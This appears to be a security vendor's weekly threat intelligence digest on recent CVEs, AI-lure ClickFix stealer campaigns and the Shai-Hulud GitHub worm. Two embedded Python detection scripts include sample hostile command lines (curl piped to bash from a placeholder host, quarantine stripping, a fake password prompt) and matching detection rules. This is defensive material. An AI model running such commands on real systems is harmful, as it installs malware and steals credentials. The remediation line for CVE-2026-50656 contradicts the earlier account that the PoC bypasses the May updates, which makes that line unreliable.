Executive Summary
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Microsoft Discloses RoguePlanet Zero-Day CVE-2026-50656 Vulnerability in Microsoft Defender - On 16th June 2026, Microsoft published an advisory for CVE-2026-50656, an elevation-of-privilege vulnerability dubbed "RoguePlanet" affecting the Microsoft Malware Protection Engine used by Microsoft Defender. At the time of writing, Microsoft classified the vulnerability as publicly disclosed but not yet exploited in the wild. Security researcher Nightmare Eclipse publicly disclosed the vulnerability and released proof-of-concept (PoC) code.
Microsoft Defender hardening updates released in May 2026 mitigated earlier exploitation paths that could have enabled remote code execution; however, the published RoguePlanet PoC bypasses those mitigations and achieves SYSTEM-level privileges on Windows 10 and Windows 11 systems running the June 2026 security updates. Notably, the PoC functions regardless of whether Microsoft Defender real-time protection is enabled or disabled, and may also be effective when Defender is operating in passive mode.
Drupal Patches Critical Vulnerability CVE-2026-55803 in Drupal Core - On 17th June 2026, Drupal patched and disclosed details of CVE-2026-55803, a critical PHP object injection vulnerability in Drupal Core affecting versions prior to 10.5.12, 10.6.10, 11.2.0-11.2.13, and 11.3.0-11.3.11. The flaw stems from incomplete protection for the entity reference field, which stores serialised data via the JSON:API, and successful exploitation would allow threat actors to inject a malicious payload.
Drupal addressed the vulnerability in versions 11.3.12, 11.2.14, 10.6.11, and 10.5.12. Organisations running affected versions of Drupal Core are advised to apply the relevant patches promptly, given the critical severity rating and the potential for remote exploitation via a commonly used API interface.
NVIDIA Patches CVE-2026-24155, CVE-2026-24252, and CVE-2026-24228 in NeMo Framework - On 16th June 2026, NVIDIA patched three vulnerabilities affecting NVIDIA NeMo versions through 2.7.2, with fixes delivered in NeMo version 2.7.3. At the time of writing, there are no known instances of active exploitation. The three vulnerabilities are CVE-2026-24155, a code injection flaw; CVE-2026-24252, an OS command injection flaw; and CVE-2026-24228, a deserialisation vulnerability.
If exploited, all three vulnerabilities share a common impact profile, enabling threat actors to execute arbitrary code, escalate privileges, disclose sensitive information, and tamper with data. CVE-2026-24252 additionally permits the execution of arbitrary operating system commands. Organisations utilising affected versions of NVIDIA NeMo are advised to upgrade to version 2.7.3 promptly.
Potential Threats
Threat Actor Uses Claude and ChatGPT GitHub Repositories To Deploy Nova Stealer Via Malicious Copy-and-Paste Execution - On 17th June 2026, Jamf Threat Labs reported on a campaign using the lure of free artificial intelligence access to deliver Nova Stealer, a macOS information stealer. The threat actor operated a GitHub account named Tributarytushift to publish fake "free Claude" and "ChatGPT trial" repositories, whose README files instructed victims to paste a curl pipe bash one-liner into Terminal — a technique Jamf Threat Labs described as a ClickFix-style variation of the older drag-to-Terminal method.
The command downloads an unsigned Nova Stealer payload from further repositories published by the same Tributarytushift account, runs xattr -c to strip the macOS quarantine attribute from the payload, and subsequently executes it. macOS users should be cautious of any repository or online resource offering free access to commercial AI tools, particularly those instructing users to run terminal commands directly.
Threat Actors Use ErrTraffic ClickFix Framework to Distribute Information Stealers and Malware Through Compromised WordPress Websites and AI-Themed Lures - On 16th June 2026, cybersecurity firm Sekoia published a report detailing ErrTraffic, a malware-as-a-service traffic distribution framework that injects malicious JavaScript into compromised websites and employs ClickFix lures to trick victims into executing malware. ErrTraffic leverages the EtherHiding technique to retrieve its command-and-control infrastructure from Polygon blockchain smart contracts, enabling threat actors to rotate infrastructure whilst distributing malware through compromised WordPress sites and dedicated lure pages. Sekoia identified two distinct clusters, named Analytics and Beer, linked to campaigns delivering payloads including Vidar, DanaBot, HijackLoader, Stealc, and SmokeLoader.
Sekoia identified three campaigns utilising the framework. The Analytics and Bintang campaigns both used stolen WordPress administrator credentials to deploy backdoors and ClickFix lures, ultimately delivering Vidar Stealer to victims; Sekoia attributed the Bintang campaign to a distinct affiliate likely based in South-East Asia. A separate series of AI platform impersonation campaigns used fake websites mimicking Google Antigravity and ChatGPT to target developers and cryptocurrency users with themed ClickFix lures, delivering DanaBot and HijackLoader respectively, likely promoted via malvertising.
Threat Actors Abuse Claude.ai Shared Chat Feature to Deliver MacSync Stealer Through ClickFix Malvertising Campaign - On 17th June 2026, TrendAI Research published a technical analysis of a malvertising campaign delivering MacSync Stealer, a macOS information stealer active since at least 2025 that targets credentials, browser data, and cryptocurrency wallet information. The campaign abused Google Ads and the claude.ai shared chat feature, which allows users to generate publicly viewable conversation URLs, to distribute ClickFix lures. Targeting victims searching for AI development tools, the threat actors impersonated brands including Claude AI, ChatGPT Codex, Perplexity AI, Cursor IDE, and JetBrains. Between 8th April and 14th June 2026, they deployed over 100 malicious hostnames across multiple attack waves, initially abusing GitLab Pages before shifting on 6th May to claude.ai shared chat URLs, thereby reducing the effectiveness of domain reputation and URL-based detection mechanisms.
The infection chain began with victims clicking sponsored Google Ads that redirected them to pages impersonating Apple Support or the Corda Team, instructing them to open Terminal and execute a supplied command. That command decoded a Base64-encoded blob to retrieve and execute a loader script, which in turn downloaded a Zsh script containing a further encoded payload. Before proceeding, the script checked for a Russian keyboard layout; if detected, execution terminated. On systems without this layout, MacSync Stealer was deployed, collecting browser credentials, session cookies, SSH keys, and cryptocurrency wallet files before exfiltrating the data to threat actor-controlled infrastructure.
General News
Five Eyes agencies sound alarm about AI’s threat to cybersecurity - The Five Eyes intelligence alliance issued a warning that rapidly evolving AI represents an urgent cybersecurity threat requiring immediate action from business leaders. The alliance cautioned that frontier AI models will likely exceed current industry expectations, fundamentally transforming offensive and defensive cyber capabilities within months rather than years. AI lowers barriers for malicious actors, increases attack speed and complexity, and is shrinking the window between vulnerability discovery and exploitation. Whilst acknowledging AI's potential to strengthen defences, the alliance stressed that cyber resilience must function under pressure, and that having controls in place alone is insufficient.
The announcement set out concrete recommendations for organisational leaders. Attack surfaces should be reduced by limiting unnecessary system access and external connectivity, and patching must be accelerated given AI-assisted exploitation timelines. Legacy systems were described as strategic liabilities rather than mere technical debt. Access controls should be tightened, critical system access restricted to as few individuals as possible, and robust authentication enforced. Leaders were urged to fund and empower internal security teams, embed foundational cybersecurity practices, and adopt secure-by-design principles as standard. The alliance also cautioned against over-reliance on any single solution, reaffirming that defence in depth remains essential.
Hostile states behind three-quarters of attacks on Britain's critical infrastructure - Richard Horne, chief executive of the National Cyber Security Centre (NCSC), warned on Wednesday that Britain is already fighting the opening exchanges of future conflicts in cyberspace, disclosing that hostile states are responsible for approximately three-quarters of attacks striking the country's critical national infrastructure. Delivering the annual security lecture at the Royal United Services Institute, Horne revealed his teams had handled more than 200 incidents affecting critical infrastructure in the year to May, regularly finding and stopping breaches before their intent became clear. He warned that adversaries were "prepositioning" throughout British critical infrastructure — establishing footholds to enable rapid exploitation and mass disruption in a time of conflict — citing the Chinese state-linked Volt Typhoon campaign against US infrastructure as the clearest example of the tactic.
Horne's speech notably reframed the language of cybersecurity, arguing the issue should no longer be treated as a "risk" to be managed but as a "contest" to be fought, placing the NCSC's vocabulary in step with NATO's position that cyberspace is "contested at all times." He cautioned that benchmarking defences against industry rivals was inadequate, stating that the only meaningful benchmark is how capability compares against that of an opponent. A new NCSC assessment judged it highly likely that by 2028 AI tools would be used to exploit known weaknesses in ageing critical infrastructure. Horne's remarks coincide with the government's progression of the Cyber Security and Resilience Bill through Parliament and plans to publish a new National Cyber Action Plan in early July.
GitHub dismissed security reports on flaws now exploited by supply-chain worm - GitHub rejected two formal vulnerability reports from threat intelligence group Deep Specter Research identifying design flaws enabling variants of the Shai-Hulud supply-chain worm to compromise hundreds of software packages and developer accounts worldwide. Both reports, submitted via GitHub's HackerOne channel, were closed as ineligible. Originating with the TeamPCP cybercrime group, copycat variants have emerged since early May and have been linked to breaches at the European Commission, AI recruiting firm Mercor, the LiteLLM package, GitHub, and Red Hat. Deep Specter confirmed 516 malicious packages live across five ecosystems including npm, PyPI, and RubyGems, with over 3,000 affected repositories and 200 compromised developer accounts — figures described as a floor, as GitHub's code search cannot index the worm's primary payload due to file size thresholds.
The two rejected reports concerned commit timestamp manipulation and author identity spoofing. The worm backdates malicious commits to resemble routine historical edits and forges author metadata to impersonate trusted engineers. GitHub responded that both behaviours are properties of the underlying git system rather than platform vulnerabilities, directing researchers to GPG and SSH commit signing and opt-in Vigilant Mode as mitigations. Crucially, GitHub's Events API records which account actually pushed each commit, data that cannot be forged, but this is not displayed on the commit page visible to reviewers and expires from public view after approximately 90 days. As of 16th June, 1,729 credential-harvesting repositories and 151 repositories serving active malicious payloads remained live on the platform.
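The reviewer-side gap described above (the pushing account is recorded in the Events API but is not shown on the commit page, and the record ages out after roughly 90 days) can be closed with a periodic cross-check that joins push events to the commits they carried. The script below is an added example, not GitHub's or Deep Specter Research's tooling. Its PushEvent records and commit metadata are constructed samples in the shape of the Events API fields actor.login, created_at and payload.commits; the trusted-pusher mapping, the seven-day backdating threshold and the finding names are my assumptions, and in a real deployment the records would be fetched from the repository's events endpoint rather than embedded inline.

```python
from datetime import datetime, timedelta, timezone

# Constructed PushEvent records in the shape of the GitHub Events API
# (only the fields used here). Not real data; logins and SHAs are placeholders.
SAMPLE_PUSH_EVENTS = [
    {"type": "PushEvent", "actor": {"login": "ci-bot-account"},
     "created_at": "2026-06-15T09:12:00Z",
     "payload": {"commits": [{"sha": "aaaa1111",
                              "author": {"name": "Alice Example", "email": "alice@example.com"}}]}},
    # A different, untrusted account pushing a commit that claims Alice as author.
    {"type": "PushEvent", "actor": {"login": "mallory-throwaway"},
     "created_at": "2026-06-15T09:30:00Z",
     "payload": {"commits": [{"sha": "bbbb2222",
                              "author": {"name": "Alice Example", "email": "alice@example.com"}}]}},
    {"type": "PushEvent", "actor": {"login": "alice-example"},
     "created_at": "2026-06-16T10:00:00Z",
     "payload": {"commits": [{"sha": "cccc3333",
                              "author": {"name": "Alice Example", "email": "alice@example.com"}}]}},
]

# Constructed commit metadata as a reviewer would see it on the commit page:
# author email, committer date, and whether the signature verified.
SAMPLE_COMMITS = [
    {"sha": "aaaa1111", "author_email": "alice@example.com",
     "committer_date": "2026-06-15T09:10:00Z", "verified": True},
    # Backdated by months and unsigned: the pattern the worm uses.
    {"sha": "bbbb2222", "author_email": "alice@example.com",
     "committer_date": "2025-11-02T14:05:00Z", "verified": False},
    {"sha": "cccc3333", "author_email": "alice@example.com",
     "committer_date": "2026-06-16T09:58:00Z", "verified": True},
    # Older commit for which no push event remains (event aged out of the API).
    {"sha": "dddd4444", "author_email": "alice@example.com",
     "committer_date": "2026-01-20T08:00:00Z", "verified": True},
]

# Assumption: which GitHub accounts may push commits authored under each email.
TRUSTED_PUSHERS = {"alice@example.com": {"alice-example", "ci-bot-account"}}

# Assumption: a commit whose committer date is more than this far before the
# push is treated as backdated.
BACKDATE_THRESHOLD = timedelta(days=7)


def parse_ts(s):
    """Parse the ISO-8601 UTC timestamps used by the Events API."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def index_pushers(events):
    """Map sha -> (pusher login, push time). The actor is the authenticated
    account that pushed, which cannot be forged in git metadata."""
    idx = {}
    for ev in events:
        if ev.get("type") != "PushEvent":
            continue
        for c in ev["payload"]["commits"]:
            idx[c["sha"]] = (ev["actor"]["login"], parse_ts(ev["created_at"]))
    return idx


def audit_commits(commits, events):
    """Return sha -> list of findings for commits that need a closer look."""
    pushers = index_pushers(events)
    findings = {}
    for c in commits:
        issues = []
        if not c["verified"]:
            issues.append("unsigned_or_unverified")
        if c["sha"] not in pushers:
            # No PushEvent left to attribute the push: treat as unverifiable.
            issues.append("pusher_unknown")
        else:
            login, pushed_at = pushers[c["sha"]]
            if login not in TRUSTED_PUSHERS.get(c["author_email"], set()):
                issues.append(f"author_spoof_suspected:{login}")
            if pushed_at - parse_ts(c["committer_date"]) > BACKDATE_THRESHOLD:
                issues.append("backdated_commit")
        if issues:
            findings[c["sha"]] = issues
    return findings


if __name__ == "__main__":
    for sha, issues in audit_commits(SAMPLE_COMMITS, SAMPLE_PUSH_EVENTS).items():
        print(sha, ", ".join(issues))
```

Because push events expire, the check only works if the join is run (and its results stored) while the events are still available; anything older than the retention window falls into the pusher_unknown bucket and has to be judged on signature verification alone.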
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.

Severity scale: ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity

| Threat Actor | Severity (previous → current) | Opportunity (previous → current) | Intent (previous → current) |
|---|---|---|---|
| RedBravo | ● High → ● High | ● 78 → ● 77 | ● 25 → ● 25 |
| DeadLock Ransomware | NEW → ● Basic | NEW → ● 25 | NEW → ● 49 |
| TAG-141 | NEW → ● Basic | NEW → ● 30 | NEW → ● 26 |
| malary | NEW → ● Basic | NEW → ● 30 | NEW → ● 25 |
| ntt050291 | NEW → ● Basic | NEW → ● 30 | NEW → ● 25 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲ Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲ Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Trend | Methods | Trend | Vulnerabilities | Trend | Targets | Trend |
|---|---|---|---|---|---|---|---|
| Scattered Spider | ▲ | Atomic Stealer | ▲ | CVE-2026-20230 | ▲ | LastPass | ▲ |
| PalachPro | ▲ | Gentlemen Ransomware | ▲ | CVE-2026-47729 | ▲ | Tata Group | ▲ |
| Owen Flowers | ▲ | DevilsTongue | ▲ | CVE-2026-8461 | ▲ | Klue | ▲ |
| Thalha Jubair | ▲ | Ransom X | ▲ | CVE-2026-35273 | ▲ | Internet Hosting | ▲ |
| carus | ▲ | SUNBURST | ▲ | CVE-2026-11882 | ▲ | KDDI | ▲ |
Prominent Information Security Events
Threat Actor Uses Claude and ChatGPT GitHub Repositories To Deploy Nova Stealer via Malicious Copy-and-Paste Execution
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - f2a014705d4215258304f79689e6d8809291b50529b2be3ef1f4f73061e8ae1c
On 17 June 2026, Jamf Threat Labs reported on a campaign using the promise of free artificial intelligence access as a lure to deliver Nova Stealer, a macOS information stealer. The threat actor operated a GitHub account named Tributarytushift to publish fraudulent repositories posing as free Claude and ChatGPT trial tools. The repositories' README files instructed victims to paste a curl pipe bash one-liner into Terminal — a ClickFix-style variation of the older drag-to-Terminal technique. This command downloaded an unsigned Nova Stealer payload from further repositories controlled by the same account, used xattr -c to strip the macOS quarantine attribute from the payload, and then executed it.
Insikt Group obtained the Nova Stealer payload, named claude, from Polyswarm. The sample matched the sandbox YARA rule for AMOS stealer and was flagged as malicious based on its execution capabilities. Sandbox analysis revealed that the sample uses shell to carry out several actions on a victim's machine, including executing itself with root privileges via sudo, running the system_profiler command to harvest system information, terminating all running Terminal processes, and displaying a fake password prompt through AppleScript to capture user credentials.
Static code analysis of the sample uncovered strings indicative of further capabilities, including enumerating files and directories, retrieving filenames and file extensions, copying and deleting files, creating directories, and obtaining the username of the logged-in user. The sample also contains the internal string macos-stealer-v2-555549447c37d273301e3c5f9cf8d1155034eb89, which may serve as a version or build identifier.
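The behaviours reported for the Nova Stealer chain above and for the MacSync Stealer chain in the Potential Threats section (curl piped straight into a shell, xattr -c on the downloaded file, a Base64 blob decoded and executed, an AppleScript prompt with a hidden answer field, system_profiler, and killing Terminal) map directly onto command-line detection content. The Python script below is an added example, not code from Jamf Threat Labs, Insikt Group or TrendAI Research. The process records, hostnames and paths in it are constructed placeholders, and the rule names and the correlation step (flagging execution of a path whose quarantine attribute was cleared earlier in the same telemetry) are my own design choices; it reads inline records, but the same functions would run over an endpoint agent's process-execution feed.

```python
import re

# Constructed sample of process-execution records, in the shape a macOS
# endpoint agent might emit (pid, parent process name, full command line).
# NOT real telemetry from the campaign; hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    {"pid": 4101, "parent": "Terminal",
     "cmd": "curl -fsSL https://raw.example.invalid/free-claude/install.sh | bash"},
    {"pid": 4102, "parent": "bash", "cmd": "xattr -c /private/tmp/claude"},
    {"pid": 4103, "parent": "bash", "cmd": "/private/tmp/claude"},
    {"pid": 4104, "parent": "bash", "cmd": "echo aGVsbG8= | base64 -d | sh"},
    {"pid": 4105, "parent": "claude",
     "cmd": "osascript -e 'display dialog \"Enter your password\" default answer \"\" with hidden answer'"},
    {"pid": 4106, "parent": "claude", "cmd": "system_profiler SPHardwareDataType"},
    {"pid": 4107, "parent": "claude", "cmd": "killall Terminal"},
    # Benign activity that must not fire.
    {"pid": 4201, "parent": "Terminal", "cmd": "brew install wget"},
    {"pid": 4202, "parent": "Terminal", "cmd": "xattr -l /Users/alice/Downloads/report.pdf"},
]

# Each rule names one behaviour from the reports and matches it on the command line.
RULES = {
    # curl output piped directly into a shell (the README one-liner)
    "curl_pipe_shell": re.compile(r"\bcurl\b[^|]*\|\s*(?:ba|z)?sh\b"),
    # quarantine attribute removed, either by clearing all xattrs (-c) or the key itself
    "quarantine_strip": re.compile(
        r"\bxattr\b(?:\s+-[a-z]+)*\s+(?:-[a-z]*c\s|-d\s+com\.apple\.quarantine)"),
    # inline Base64 decoded and handed to a shell
    "b64_decode_exec": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:ba|z)?sh\b"),
    # AppleScript dialog with a hidden answer field (fake password prompt)
    "hidden_answer_prompt": re.compile(r"\bosascript\b.*display dialog.*hidden answer"),
    # host reconnaissance
    "system_profiler": re.compile(r"\bsystem_profiler\b"),
    # terminating the user's Terminal sessions
    "kill_terminal": re.compile(r"\bkillall\s+Terminal\b"),
}

# Captures the path whose attributes were cleared, for correlation with later execution.
QUARANTINE_CLEAR_PATH = re.compile(r"\bxattr\b(?:\s+-[a-z]+)*\s+-[a-z]*c\s+(\S+)")

# The three steps that together make up the copy-and-paste infection chain.
CHAIN = ("curl_pipe_shell", "quarantine_strip", "quarantine_stripped_exec")


def match_rules(cmd):
    """Names of every rule whose pattern matches this command line."""
    return [name for name, pat in RULES.items() if pat.search(cmd)]


def analyse(events):
    """Map each suspicious pid to its rule hits, and flag execution of any path
    whose quarantine attribute was cleared earlier in the same event stream."""
    hits = {}
    cleared_paths = set()
    for ev in events:
        names = match_rules(ev["cmd"])
        m = QUARANTINE_CLEAR_PATH.search(ev["cmd"])
        if m:
            cleared_paths.add(m.group(1))
        parts = ev["cmd"].split()
        program = parts[0] if parts else ""
        if program in cleared_paths:
            names.append("quarantine_stripped_exec")
        if names:
            hits[ev["pid"]] = names
    return hits


def clickfix_chain_present(hits):
    """True when download-via-shell, quarantine removal and execution of the
    cleared file all appear in the analysed events."""
    seen = {name for names in hits.values() for name in names}
    return all(step in seen for step in CHAIN)


if __name__ == "__main__":
    result = analyse(SAMPLE_EVENTS)
    for pid, names in result.items():
        print(pid, ", ".join(names))
    print("ClickFix chain present:", clickfix_chain_present(result))
```

Individual rules such as system_profiler or killall are noisy on their own; the value is in the correlation, where a shell spawned from a curl pipe strips quarantine from a file and then runs it, which is rarely legitimate on a managed endpoint.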
Threat Actors Use ErrTraffic ClickFix Framework to Distribute Information Stealers and Malware Through Compromised WordPress Websites and AI-Themed Lures
Source: Insikt Group | Validated Intelligence Event
IOC: Domain: antigravity[.]study
On 16 June 2026, cybersecurity firm Sekoia published a report detailing ErrTraffic, a malware-as-a-service traffic distribution framework that injects malicious JavaScript into compromised websites and uses ClickFix lures to trick victims into executing malware. ErrTraffic employs the EtherHiding technique to retrieve its command-and-control infrastructure from Polygon blockchain smart contracts, enabling threat actors to rotate infrastructure whilst distributing malware through compromised WordPress sites and dedicated lure pages. Sekoia identified two distinct clusters, named Analytics and Beer, linked to campaigns delivering payloads including Vidar, DanaBot, HijackLoader, Stealc, and SmokeLoader.
In the Analytics campaign, threat actors accessed WordPress websites using stolen administrator credentials, deployed a backdoor plugin that harvested credentials and exfiltrated session cookies, then used it to serve ClickFix lures via the ErrTraffic framework - with victims ultimately running Vidar Stealer. The Bintang campaign followed a similar pattern, using PHP backdoors and a remote webshell to inject ErrTraffic's JavaScript into compromised sites, again delivering Vidar Stealer. Sekoia attributed this campaign to a distinct affiliate likely based in Southeast Asia.
In a separate set of campaigns, threat actors created fake AI-themed websites impersonating Google Antigravity and ChatGPT to target developers, AI researchers, and cryptocurrency users. Each site displayed a distinct ClickFix lure - a blue screen of death theme and a reCAPTCHA theme respectively - both tied to Polygon blockchain smart contracts. Victims who executed the provided PowerShell commands received different payloads: the Antigravity-themed campaign installed DanaBot, whilst the ChatGPT-themed campaign deployed HijackLoader via an archive exceeding 120 MB.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2026-50656 (Defender) – Microsoft released hardening updates in May 2026 which will remediate this vulnerability.
- CVE-2026-55803 (Drupal Core) – Drupal addressed this vulnerability in versions 11.3.12, 11.2.14, 10.6.11, and 10.5.12.
- CVE-2026-24155, CVE-2026-24252, CVE-2026-24228 (NeMo) – Upgrading to NVIDIA NeMo version 2.7.3 will remediate these vulnerabilities.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.